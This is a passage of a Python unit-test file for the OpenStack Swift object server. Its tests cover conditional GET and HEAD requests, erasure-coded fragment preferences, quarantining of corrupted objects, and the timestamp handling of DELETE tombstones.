resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 200)
since = strftime('%a, %d %b %Y %H:%M:%S GMT',
gmtime(float(timestamp) + 1))
req = Request.blank('/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'GET'},
headers={'If-Modified-Since': since})
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 304)
since = \
strftime('%a, %d %b %Y %H:%M:%S GMT', gmtime(float(timestamp) - 1))
req = Request.blank('/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'GET'},
headers={'If-Modified-Since': since})
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 200)
since = \
strftime('%a, %d %b %Y %H:%M:%S GMT', gmtime(float(timestamp) + 1))
req = Request.blank('/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'GET'},
headers={'If-Modified-Since': since})
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 304)
req = Request.blank('/sda1/p/a/c/o',
environ={'REQUEST_METHOD': 'HEAD'})
resp = req.get_response(self.object_controller)
since = resp.headers['Last-Modified']
self.assertEqual(since, strftime('%a, %d %b %Y %H:%M:%S GMT',
gmtime(math.ceil(float(timestamp)))))
req = Request.blank('/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'GET'},
headers={'If-Modified-Since': since})
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 304)
timestamp = normalize_timestamp(int(time()))
req = Request.blank('/sda1/p/a/c/o2',
environ={'REQUEST_METHOD': 'PUT'},
headers={
'X-Timestamp': timestamp,
'Content-Type': 'application/octet-stream',
'Content-Length': '4'})
req.body = 'test'
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 201)
since = strftime('%a, %d %b %Y %H:%M:%S GMT',
gmtime(float(timestamp)))
req = Request.blank('/sda1/p/a/c/o2',
environ={'REQUEST_METHOD': 'GET'},
headers={'If-Modified-Since': since})
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 304)
def test_HEAD_if_modified_since(self):
timestamp = normalize_timestamp(time())
req = Request.blank('/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'PUT'},
headers={
'X-Timestamp': timestamp,
'Content-Type': 'application/octet-stream',
'Content-Length': '4'})
req.body = 'test'
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 201)
req = Request.blank('/sda1/p/a/c/o',
environ={'REQUEST_METHOD': 'HEAD'})
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 200)
since = strftime('%a, %d %b %Y %H:%M:%S GMT',
gmtime(float(timestamp) + 1))
req = Request.blank('/sda1/p/a/c/o',
environ={'REQUEST_METHOD': 'HEAD'},
headers={'If-Modified-Since': since})
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 304)
since = \
strftime('%a, %d %b %Y %H:%M:%S GMT', gmtime(float(timestamp) - 1))
req = Request.blank('/sda1/p/a/c/o',
environ={'REQUEST_METHOD': 'HEAD'},
headers={'If-Modified-Since': since})
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 200)
since = \
strftime('%a, %d %b %Y %H:%M:%S GMT', gmtime(float(timestamp) + 1))
req = Request.blank('/sda1/p/a/c/o',
environ={'REQUEST_METHOD': 'HEAD'},
headers={'If-Modified-Since': since})
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 304)
req = Request.blank('/sda1/p/a/c/o',
environ={'REQUEST_METHOD': 'HEAD'})
resp = req.get_response(self.object_controller)
since = resp.headers['Last-Modified']
self.assertEqual(since, strftime('%a, %d %b %Y %H:%M:%S GMT',
gmtime(math.ceil(float(timestamp)))))
req = Request.blank('/sda1/p/a/c/o',
environ={'REQUEST_METHOD': 'HEAD'},
headers={'If-Modified-Since': since})
resp = self.object_controller.GET(req)
self.assertEqual(resp.status_int, 304)
timestamp = normalize_timestamp(int(time()))
req = Request.blank('/sda1/p/a/c/o2',
environ={'REQUEST_METHOD': 'PUT'},
headers={
'X-Timestamp': timestamp,
'Content-Type': 'application/octet-stream',
'Content-Length': '4'})
req.body = 'test'
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 201)
since = strftime('%a, %d %b %Y %H:%M:%S GMT',
gmtime(float(timestamp)))
req = Request.blank('/sda1/p/a/c/o2',
environ={'REQUEST_METHOD': 'HEAD'},
headers={'If-Modified-Since': since})
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 304)
def test_GET_if_unmodified_since(self):
timestamp = normalize_timestamp(time())
req = Request.blank('/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'PUT'},
headers={
'X-Timestamp': timestamp,
'X-Object-Meta-Burr': 'ito',
'Content-Type': 'application/cat-picture',
'Content-Length': '4'})
req.body = 'test'
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 201)
req = Request.blank('/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'GET'})
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 200)
since = strftime('%a, %d %b %Y %H:%M:%S GMT',
gmtime(float(timestamp) + 1))
req = Request.blank('/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'GET'},
headers={'If-Unmodified-Since': since})
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 200)
since = \
strftime('%a, %d %b %Y %H:%M:%S GMT', gmtime(float(timestamp) - 9))
req = Request.blank('/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'GET'},
headers={'If-Unmodified-Since': since})
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 412)
self.assertEqual(resp.headers['Content-Type'],
'application/cat-picture')
self.assertEqual(resp.headers['X-Object-Meta-Burr'], 'ito')
since = \
strftime('%a, %d %b %Y %H:%M:%S GMT', gmtime(float(timestamp) + 9))
req = Request.blank('/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'GET'},
headers={'If-Unmodified-Since': since})
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 200)
req = Request.blank('/sda1/p/a/c/o',
environ={'REQUEST_METHOD': 'HEAD'})
resp = req.get_response(self.object_controller)
since = resp.headers['Last-Modified']
self.assertEqual(since, strftime('%a, %d %b %Y %H:%M:%S GMT',
gmtime(math.ceil(float(timestamp)))))
req = Request.blank('/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'GET'},
headers={'If-Unmodified-Since': since})
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 200)
def test_HEAD_if_unmodified_since(self):
timestamp = normalize_timestamp(time())
req = Request.blank(
'/sda1/p/a/c/o',
environ={'REQUEST_METHOD': 'PUT'},
headers={'X-Timestamp': timestamp,
'Content-Type': 'application/octet-stream',
'Content-Length': '4'})
req.body = 'test'
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 201)
since = strftime('%a, %d %b %Y %H:%M:%S GMT',
gmtime(math.ceil(float(timestamp)) + 1))
req = Request.blank('/sda1/p/a/c/o',
environ={'REQUEST_METHOD': 'HEAD'},
headers={'If-Unmodified-Since': since})
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 200)
since = strftime('%a, %d %b %Y %H:%M:%S GMT',
gmtime(math.ceil(float(timestamp))))
req = Request.blank('/sda1/p/a/c/o',
environ={'REQUEST_METHOD': 'HEAD'},
headers={'If-Unmodified-Since': since})
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 200)
since = strftime('%a, %d %b %Y %H:%M:%S GMT',
gmtime(math.ceil(float(timestamp)) - 1))
req = Request.blank('/sda1/p/a/c/o',
environ={'REQUEST_METHOD': 'HEAD'},
headers={'If-Unmodified-Since': since})
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 412)
def assertECBodyEqual(self, resp, expected):
# we pull the policy index from the request environ since it seems to
# be missing from the response headers
policy_index = int(
resp.request.headers['X-Backend-Storage-Policy-Index'])
policy = POLICIES[policy_index]
frags = encode_frag_archive_bodies(policy, expected)
frag_index = int(resp.headers['X-Object-Sysmeta-Ec-Frag-Index'])
self.assertEqual(resp.body, frags[frag_index])
def _create_ondisk_fragments(self, policy):
# Create some on disk files...
ts_iter = make_timestamp_iter()
# PUT at ts_0
ts_0 = next(ts_iter)
body = 'OLDER'
headers = {'X-Timestamp': ts_0.internal,
'Content-Length': '5',
'Content-Type': 'application/octet-stream',
'X-Backend-Storage-Policy-Index': int(policy)}
if policy.policy_type == EC_POLICY:
body = encode_frag_archive_bodies(policy, body)[0]
headers.update({
'X-Object-Sysmeta-Ec-Frag-Index': '0',
'Content-Length': len(body),
})
req = Request.blank('/sda1/p/a/c/o',
environ={'REQUEST_METHOD': 'PUT'},
headers=headers)
req.body = body
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 201)
# POST at ts_1
ts_1 = next(ts_iter)
headers = {'X-Timestamp': ts_1.internal,
'X-Backend-Storage-Policy-Index': int(policy)}
headers['X-Object-Meta-Test'] = 'abc'
req = Request.blank('/sda1/p/a/c/o',
environ={'REQUEST_METHOD': 'POST'},
headers=headers)
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 202)
# PUT again at ts_2 but without making the data file durable
ts_2 = next(ts_iter)
body = 'NEWER'
headers = {'X-Timestamp': ts_2.internal,
'Content-Length': '5',
'Content-Type': 'application/octet-stream',
'X-Backend-Storage-Policy-Index': int(policy)}
if policy.policy_type == EC_POLICY:
body = encode_frag_archive_bodies(policy, body)[2]
headers.update({
'X-Object-Sysmeta-Ec-Frag-Index': '2',
'Content-Length': len(body),
})
req = Request.blank('/sda1/p/a/c/o',
environ={'REQUEST_METHOD': 'PUT'},
headers=headers)
req.body = body
# patch the commit method to do nothing so EC object is non-durable
with mock.patch('swift.obj.diskfile.ECDiskFileWriter.commit'):
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 201)
return ts_0, ts_1, ts_2
def test_GET_HEAD_with_fragment_preferences(self):
for policy in POLICIES:
ts_0, ts_1, ts_2 = self._create_ondisk_fragments(policy)
backend_frags = {ts_0.internal: [0], ts_2.internal: [2]}
def _assert_frag_0_at_ts_0(resp):
expect = {
'X-Timestamp': ts_1.normal,
'X-Backend-Timestamp': ts_1.internal,
'X-Backend-Data-Timestamp': ts_0.internal,
'X-Backend-Durable-Timestamp': ts_0.internal,
'X-Object-Sysmeta-Ec-Frag-Index': '0',
'X-Object-Meta-Test': 'abc'}
self.assertDictContainsSubset(expect, resp.headers)
self.assertEqual(backend_frags, json.loads(
resp.headers['X-Backend-Fragments']))
def _assert_repl_data_at_ts_2():
self.assertIn(resp.status_int, (200, 202))
expect = {
'X-Timestamp': ts_2.normal,
'X-Backend-Timestamp': ts_2.internal,
'X-Backend-Data-Timestamp': ts_2.internal,
'X-Backend-Durable-Timestamp': ts_2.internal}
self.assertDictContainsSubset(expect, resp.headers)
self.assertNotIn('X-Object-Meta-Test', resp.headers)
# Sanity check: Request with no preferences should default to the
# durable frag
headers = {'X-Backend-Storage-Policy-Index': int(policy)}
req = Request.blank('/sda1/p/a/c/o', headers=headers,
environ={'REQUEST_METHOD': 'GET'})
resp = req.get_response(self.object_controller)
if policy.policy_type == EC_POLICY:
_assert_frag_0_at_ts_0(resp)
self.assertECBodyEqual(resp, 'OLDER')
else:
_assert_repl_data_at_ts_2()
self.assertEqual(resp.body, 'NEWER')
req = Request.blank('/sda1/p/a/c/o', headers=headers,
environ={'REQUEST_METHOD': 'HEAD'})
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 200)
if policy.policy_type == EC_POLICY:
_assert_frag_0_at_ts_0(resp)
else:
_assert_repl_data_at_ts_2()
# Request with preferences can select the older frag
prefs = json.dumps(
[{'timestamp': ts_0.internal, 'exclude': [1, 3]}])
headers = {'X-Backend-Storage-Policy-Index': int(policy),
'X-Backend-Fragment-Preferences': prefs}
req = Request.blank('/sda1/p/a/c/o', headers=headers,
environ={'REQUEST_METHOD': 'GET'})
resp = req.get_response(self.object_controller)
if policy.policy_type == EC_POLICY:
_assert_frag_0_at_ts_0(resp)
self.assertECBodyEqual(resp, 'OLDER')
else:
_assert_repl_data_at_ts_2()
self.assertEqual(resp.body, 'NEWER')
req = Request.blank('/sda1/p/a/c/o', headers=headers,
environ={'REQUEST_METHOD': 'HEAD'})
resp = req.get_response(self.object_controller)
if policy.policy_type == EC_POLICY:
_assert_frag_0_at_ts_0(resp)
else:
_assert_repl_data_at_ts_2()
def _assert_frag_2_at_ts_2(resp):
self.assertIn(resp.status_int, (200, 202))
# do not expect meta file to be included since it is older
expect = {
'X-Timestamp': ts_2.normal,
'X-Backend-Timestamp': ts_2.internal,
'X-Backend-Data-Timestamp': ts_2.internal,
'X-Backend-Durable-Timestamp': ts_0.internal,
'X-Object-Sysmeta-Ec-Frag-Index': '2'}
self.assertDictContainsSubset(expect, resp.headers)
self.assertEqual(backend_frags, json.loads(
resp.headers['X-Backend-Fragments']))
self.assertNotIn('X-Object-Meta-Test', resp.headers)
# Request with preferences can select the newer non-durable frag
prefs = json.dumps(
[{'timestamp': ts_2.internal, 'exclude': [1, 3]}])
headers = {'X-Backend-Storage-Policy-Index': int(policy),
'X-Backend-Fragment-Preferences': prefs}
req = Request.blank('/sda1/p/a/c/o', headers=headers,
environ={'REQUEST_METHOD': 'GET'})
resp = req.get_response(self.object_controller)
if policy.policy_type == EC_POLICY:
_assert_frag_2_at_ts_2(resp)
self.assertECBodyEqual(resp, 'NEWER')
else:
_assert_repl_data_at_ts_2()
self.assertEqual(resp.body, 'NEWER')
req = Request.blank('/sda1/p/a/c/o', headers=headers,
environ={'REQUEST_METHOD': 'HEAD'})
resp = req.get_response(self.object_controller)
if policy.policy_type == EC_POLICY:
_assert_frag_2_at_ts_2(resp)
else:
_assert_repl_data_at_ts_2()
# Request with preference for ts_0 but excludes index 0 will
# default to newest frag
prefs = json.dumps(
[{'timestamp': ts_0.internal, 'exclude': [0]}])
headers = {'X-Backend-Storage-Policy-Index': int(policy),
'X-Backend-Fragment-Preferences': prefs}
req = Request.blank('/sda1/p/a/c/o', headers=headers,
environ={'REQUEST_METHOD': 'GET'})
resp = req.get_response(self.object_controller)
if policy.policy_type == EC_POLICY:
_assert_frag_2_at_ts_2(resp)
self.assertECBodyEqual(resp, 'NEWER')
else:
_assert_repl_data_at_ts_2()
self.assertEqual(resp.body, 'NEWER')
req = Request.blank('/sda1/p/a/c/o', headers=headers,
environ={'REQUEST_METHOD': 'HEAD'})
resp = req.get_response(self.object_controller)
if policy.policy_type == EC_POLICY:
_assert_frag_2_at_ts_2(resp)
else:
_assert_repl_data_at_ts_2()
# Request with preferences that exclude all frags get nothing
prefs = json.dumps(
[{'timestamp': ts_0.internal, 'exclude': [0]},
{'timestamp': ts_2.internal, 'exclude': [2]}])
headers = {'X-Backend-Storage-Policy-Index': int(policy),
'X-Backend-Fragment-Preferences': prefs}
req = Request.blank('/sda1/p/a/c/o', headers=headers,
environ={'REQUEST_METHOD': 'GET'})
resp = req.get_response(self.object_controller)
if policy.policy_type == EC_POLICY:
self.assertEqual(resp.status_int, 404)
else:
_assert_repl_data_at_ts_2()
self.assertEqual(resp.body, 'NEWER')
req = Request.blank('/sda1/p/a/c/o', headers=headers,
environ={'REQUEST_METHOD': 'HEAD'})
resp = req.get_response(self.object_controller)
if policy.policy_type == EC_POLICY:
self.assertEqual(resp.status_int, 404)
else:
_assert_repl_data_at_ts_2()
# Request with empty preferences will get non-durable
prefs = json.dumps([])
headers = {'X-Backend-Storage-Policy-Index': int(policy),
'X-Backend-Fragment-Preferences': prefs}
req = Request.blank('/sda1/p/a/c/o', headers=headers,
environ={'REQUEST_METHOD': 'GET'})
resp = req.get_response(self.object_controller)
if policy.policy_type == EC_POLICY:
_assert_frag_2_at_ts_2(resp)
self.assertECBodyEqual(resp, 'NEWER')
else:
_assert_repl_data_at_ts_2()
self.assertEqual(resp.body, 'NEWER')
req = Request.blank('/sda1/p/a/c/o', headers=headers,
environ={'REQUEST_METHOD': 'HEAD'})
resp = req.get_response(self.object_controller)
if policy.policy_type == EC_POLICY:
_assert_frag_2_at_ts_2(resp)
else:
_assert_repl_data_at_ts_2()
def test_GET_quarantine(self):
# Test swift.obj.server.ObjectController.GET
timestamp = normalize_timestamp(time())
req = Request.blank('/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'PUT'},
headers={'X-Timestamp': timestamp,
'Content-Type': 'application/x-test'})
req.body = 'VERIFY'
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 201)
disk_file = self.df_mgr.get_diskfile('sda1', 'p', 'a', 'c', 'o',
policy=POLICIES.legacy)
disk_file.open()
file_name = os.path.basename(disk_file._data_file)
etag = md5()
etag.update('VERIF')
etag = etag.hexdigest()
metadata = {'X-Timestamp': timestamp, 'name': '/a/c/o',
'Content-Length': 6, 'ETag': etag}
diskfile.write_metadata(disk_file._fp, metadata)
self.assertEqual(os.listdir(disk_file._datadir)[0], file_name)
req = Request.blank('/sda1/p/a/c/o')
resp = req.get_response(self.object_controller)
quar_dir = os.path.join(
self.testdir, 'sda1', 'quarantined', 'objects',
os.path.basename(os.path.dirname(disk_file._data_file)))
self.assertEqual(os.listdir(disk_file._datadir)[0], file_name)
body = resp.body # actually does quarantining
self.assertEqual(body, 'VERIFY')
self.assertEqual(os.listdir(quar_dir)[0], file_name)
req = Request.blank('/sda1/p/a/c/o')
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 404)
def test_GET_quarantine_zbyte(self):
# Test swift.obj.server.ObjectController.GET
timestamp = normalize_timestamp(time())
req = Request.blank('/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'PUT'},
headers={'X-Timestamp': timestamp,
'Content-Type': 'application/x-test'})
req.body = 'VERIFY'
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 201)
disk_file = self.df_mgr.get_diskfile('sda1', 'p', 'a', 'c', 'o',
policy=POLICIES.legacy)
disk_file.open()
file_name = os.path.basename(disk_file._data_file)
with open(disk_file._data_file) as fp:
metadata = diskfile.read_metadata(fp)
os.unlink(disk_file._data_file)
with open(disk_file._data_file, 'w') as fp:
diskfile.write_metadata(fp, metadata)
self.assertEqual(os.listdir(disk_file._datadir)[0], file_name)
req = Request.blank('/sda1/p/a/c/o')
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 404)
quar_dir = os.path.join(
self.testdir, 'sda1', 'quarantined', 'objects',
os.path.basename(os.path.dirname(disk_file._data_file)))
self.assertEqual(os.listdir(quar_dir)[0], file_name)
def test_GET_quarantine_range(self):
# Test swift.obj.server.ObjectController.GET
timestamp = normalize_timestamp(time())
req = Request.blank('/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'PUT'},
headers={'X-Timestamp': timestamp,
'Content-Type': 'application/x-test'})
req.body = 'VERIFY'
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 201)
disk_file = self.df_mgr.get_diskfile('sda1', 'p', 'a', 'c', 'o',
policy=POLICIES.legacy)
disk_file.open()
file_name = os.path.basename(disk_file._data_file)
etag = md5()
etag.update('VERIF')
etag = etag.hexdigest()
metadata = {'X-Timestamp': timestamp, 'name': '/a/c/o',
'Content-Length': 6, 'ETag': etag}
diskfile.write_metadata(disk_file._fp, metadata)
self.assertEqual(os.listdir(disk_file._datadir)[0], file_name)
req = Request.blank('/sda1/p/a/c/o')
req.range = 'bytes=0-4' # partial
resp = req.get_response(self.object_controller)
quar_dir = os.path.join(
self.testdir, 'sda1', 'quarantined', 'objects',
os.path.basename(os.path.dirname(disk_file._data_file)))
resp.body
self.assertEqual(os.listdir(disk_file._datadir)[0], file_name)
self.assertFalse(os.path.isdir(quar_dir))
req = Request.blank('/sda1/p/a/c/o')
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 200)
req = Request.blank('/sda1/p/a/c/o')
req.range = 'bytes=1-6' # partial
resp = req.get_response(self.object_controller)
quar_dir = os.path.join(
self.testdir, 'sda1', 'quarantined', 'objects',
os.path.basename(os.path.dirname(disk_file._data_file)))
resp.body
self.assertEqual(os.listdir(disk_file._datadir)[0], file_name)
self.assertFalse(os.path.isdir(quar_dir))
req = Request.blank('/sda1/p/a/c/o')
req.range = 'bytes=0-14' # full
resp = req.get_response(self.object_controller)
quar_dir = os.path.join(
self.testdir, 'sda1', 'quarantined', 'objects',
os.path.basename(os.path.dirname(disk_file._data_file)))
self.assertEqual(os.listdir(disk_file._datadir)[0], file_name)
resp.body
self.assertTrue(os.path.isdir(quar_dir))
req = Request.blank('/sda1/p/a/c/o')
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 404)
@mock.patch("time.time", mock_time)
def test_DELETE(self):
# Test swift.obj.server.ObjectController.DELETE
req = Request.blank('/sda1/p/a/c',
environ={'REQUEST_METHOD': 'DELETE'})
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 400)
req = Request.blank('/sda1/p/a/c/o',
environ={'REQUEST_METHOD': 'DELETE'})
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 400)
# The following should have created a tombstone file
timestamp = normalize_timestamp(1000)
req = Request.blank('/sda1/p/a/c/o',
environ={'REQUEST_METHOD': 'DELETE'},
headers={'X-Timestamp': timestamp})
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 404)
ts_1000_file = os.path.join(
self.testdir, 'sda1',
storage_directory(diskfile.get_data_dir(POLICIES[0]), 'p',
hash_path('a', 'c', 'o')),
utils.Timestamp(timestamp).internal + '.ts')
self.assertTrue(os.path.isfile(ts_1000_file))
# There should now be a 1000 ts file.
self.assertEqual(len(os.listdir(os.path.dirname(ts_1000_file))), 1)
# The following should *not* have created a tombstone file.
timestamp = normalize_timestamp(999)
req = Request.blank('/sda1/p/a/c/o',
environ={'REQUEST_METHOD': 'DELETE'},
headers={'X-Timestamp': timestamp})
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 404)
ts_999_file = os.path.join(
self.testdir, 'sda1',
storage_directory(diskfile.get_data_dir(POLICIES[0]), 'p',
hash_path('a', 'c', 'o')),
utils.Timestamp(timestamp).internal + '.ts')
self.assertFalse(os.path.isfile(ts_999_file))
self.assertTrue(os.path.isfile(ts_1000_file))
self.assertEqual(len(os.listdir(os.path.dirname(ts_1000_file))), 1)
orig_timestamp = utils.Timestamp(1002).internal
headers = {'X-Timestamp': orig_timestamp,
'Content-Type': 'application/octet-stream',
'Content-Length': '4'}
req = Request.blank('/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'PUT'},
headers=headers)
req.body = 'test'
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 201)
# There should now be 1000 ts and a 1001 data file.
data_1002_file = os.path.join(
self.testdir, 'sda1',
storage_directory(diskfile.get_data_dir(POLICIES[0]), 'p',
hash_path('a', 'c', 'o')),
orig_timestamp + '.data')
self.assertTrue(os.path.isfile(data_1002_file))
self.assertEqual(len(os.listdir(os.path.dirname(data_1002_file))), 1)
# The following should *not* have created a tombstone file.
timestamp = normalize_timestamp(1001)
req = Request.blank('/sda1/p/a/c/o',
environ={'REQUEST_METHOD': 'DELETE'},
headers={'X-Timestamp': timestamp})
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 409)
self.assertEqual(resp.headers['X-Backend-Timestamp'], orig_timestamp)
ts_1001_file = os.path.join(
self.testdir, 'sda1',
storage_directory(diskfile.get_data_dir(POLICIES[0]), 'p',
hash_path('a', 'c', 'o')),
utils.Timestamp(timestamp).internal + '.ts')
self.assertFalse(os.path.isfile(ts_1001_file))
self.assertTrue(os.path.isfile(data_1002_file))
self.assertEqual(len(os.listdir(os.path.dirname(ts_1001_file))), 1)
timestamp = normalize_timestamp(1003)
req = Request.blank('/sda1/p/a/c/o',
environ={'REQUEST_METHOD': 'DELETE'},
headers={'X-Timestamp': timestamp})
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 204)
ts_1003_file = os.path.join(
self.testdir, 'sda1',
storage_directory(diskfile.get_data_dir(POLICIES[0]), 'p',
hash_path('a', 'c', 'o')),
utils.Timestamp(timestamp).internal + '.ts')
self.assertTrue(os.path.isfile(ts_1003_file))
self.assertEqual(len(os.listdir(os.path.dirname(ts_1003_file))), 1)
def test_DELETE_bad_timestamp(self):
req = Request.blank(
'/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'DELETE'},
headers={'X-Timestamp': 'bad'})
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 400)
def test_DELETE_succeeds_with_later_POST(self):
t_put = next(self.ts).internal
req = Request.blank('/sda1/p/a/c/o',
environ={'REQUEST_METHOD': 'PUT'},
headers={'X-Timestamp': t_put,
'Content-Length': 0,
'Content-Type': 'plain/text'})
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 201)
t_delete = next(self.ts).internal
t_post = next(self.ts).internal
req = Request.blank('/sda1/p/a/c/o',
environ={'REQUEST_METHOD': 'POST'},
headers={'X-Timestamp': t_post})
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 202)
req = Request.blank('/sda1/p/a/c/o',
environ={'REQUEST_METHOD': 'DELETE'},
headers={'X-Timestamp': t_delete},
)
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 204)
obj_dir = os.path.join(
self.testdir, 'sda1',
storage_directory(diskfile.get_data_dir(0), 'p',
hash_path('a', 'c', 'o')))
ts_file = os.path.join(obj_dir, t_delete + '.ts')
self.assertTrue(os.path.isfile(ts_file))
meta_file = os.path.join(obj_dir, t_post + '.meta')
self.assertTrue(os.path.isfile(meta_file))
def test_DELETE_container_updates(self):
# Test swift.obj.server.ObjectController.DELETE and container
# updates, making sure container update is called in the correct
# state.
start = time()
orig_timestamp = utils.Timestamp(start)
headers = {'X-Timestamp': orig_timestamp.internal,
'Content-Type': 'application/octet-stream',
'Content-Length': '4'}
req = Request.blank('/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'PUT'},
headers=headers)
req.body = 'test'
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 201)
calls_made = [0]
def our_container_update(*args, **kwargs):
calls_made[0] += 1
orig_cu = self.object_controller.container_update
self.object_controller.container_update = our_container_update
try:
# The following request should return 409 (HTTP Conflict). A
# tombstone file should not have been created with this timestamp.
timestamp = utils.Timestamp(start - 0.00001)
req = Request.blank('/sda1/p/a/c/o',
environ={'REQUEST_METHOD': 'DELETE'},
headers={'X-Timestamp': timestamp.internal})
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 409)
self.assertEqual(resp.headers['x-backend-timestamp'],
orig_timestamp.internal)
objfile = os.path.join(
self.testdir, 'sda1',
storage_directory(diskfile.get_data_dir(POLICIES[0]), 'p',
hash_path('a', 'c', 'o')),
utils.Timestamp(timestamp).internal + '.ts')
self.assertFalse(os.path.isfile(objfile))
self.assertEqual(len(os.listdir(os.path.dirname(objfile))), 1)
self.assertEqual(0, calls_made[0])
# The following request should return 204, and the object should
# be truly deleted (container update is performed) because this
# timestamp is newer. A tombstone file should have been created
# with this timestamp.
timestamp = utils.Timestamp(start + 0.00001)
req = Request.blank('/sda1/p/a/c/o',
environ={'REQUEST_METHOD': 'DELETE'},
headers={'X-Timestamp': timestamp.internal})
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 204)
objfile = os.path.join(
self.testdir, 'sda1',
storage_directory(diskfile.get_data_dir(POLICIES[0]), 'p',
hash_path('a', 'c', 'o')),
utils.Timestamp(timestamp).internal + '.ts')
self.assertTrue(os.path.isfile(objfile))
self.assertEqual(1, calls_made[0])
self.assertEqual(len(os.listdir(os.path.dirname(objfile))), 1)
# The following request should return a 404, as the object should
# already have been deleted, but it should have also performed a
# container update because the timestamp is newer, and a tombstone
# file should also exist with this timestamp.
timestamp = utils.Timestamp(start + 0.00002)
req = Request.blank('/sda1/p/a/c/o',
environ={'REQUEST_METHOD': 'DELETE'},
headers={'X-Timestamp': timestamp.internal})
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 404)
objfile = os.path.join(
self.testdir, 'sda1',
storage_directory(diskfile.get_data_dir(POLICIES[0]), 'p',
hash_path('a', 'c', 'o')),
utils.Timestamp(timestamp).internal + '.ts')
self.assertTrue(os.path.isfile(objfile))
self.assertEqual(2, calls_made[0])
self.assertEqual(len(os.listdir(os.path.dirname(objfile))), 1)
# The following request should return a 404, as the object should
# already have been deleted, and it should not have performed a
# container update because the timestamp is older, or created a
# tombstone file with this timestamp.
timestamp = utils.Timestamp(start + 0.00001)
req = Request.blank('/sda1/p/a/c/o',
environ={'REQUEST_METHOD': 'DELETE'},
headers={'X-Timestamp': timestamp.internal})
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 404)
objfile = os.path.join(
self.testdir, 'sda1',
storage_directory(diskfile.get_data_dir(POLICIES[0]), 'p',
hash_path('a', 'c', 'o')),
utils.Timestamp(timestamp).internal + '.ts')
self.assertFalse(os.path.isfile(objfile))
self.assertEqual(2, calls_made[0])
self.assertEqual(len(os.listdir(os.path.dirname(objfile))), 1)
finally:
self.object_controller.container_update = orig_cu
def test_DELETE_full_drive(self):
def mock_diskfile_delete(self, timestamp):
raise DiskFileNoSpace()
t_put = utils.Timestamp(time())
req = Request.blank('/sda1/p/a/c/o',
environ={'REQUEST_METHOD': 'PUT'},
headers={'X-Timestamp': t_put.internal,
'Content-Length': 0,
'Content-Type': 'plain/text'})
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 201)
with mock.patch('swift.obj.diskfile.BaseDiskFile.delete',
mock_diskfile_delete):
t_delete = utils.Timestamp(time())
req = Request.blank('/sda1/p/a/c/o',
environ={'REQUEST_METHOD': 'DELETE'},
headers={'X-Timestamp': t_delete.internal})
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 507)
def test_object_update_with_offset(self):
container_updates = []
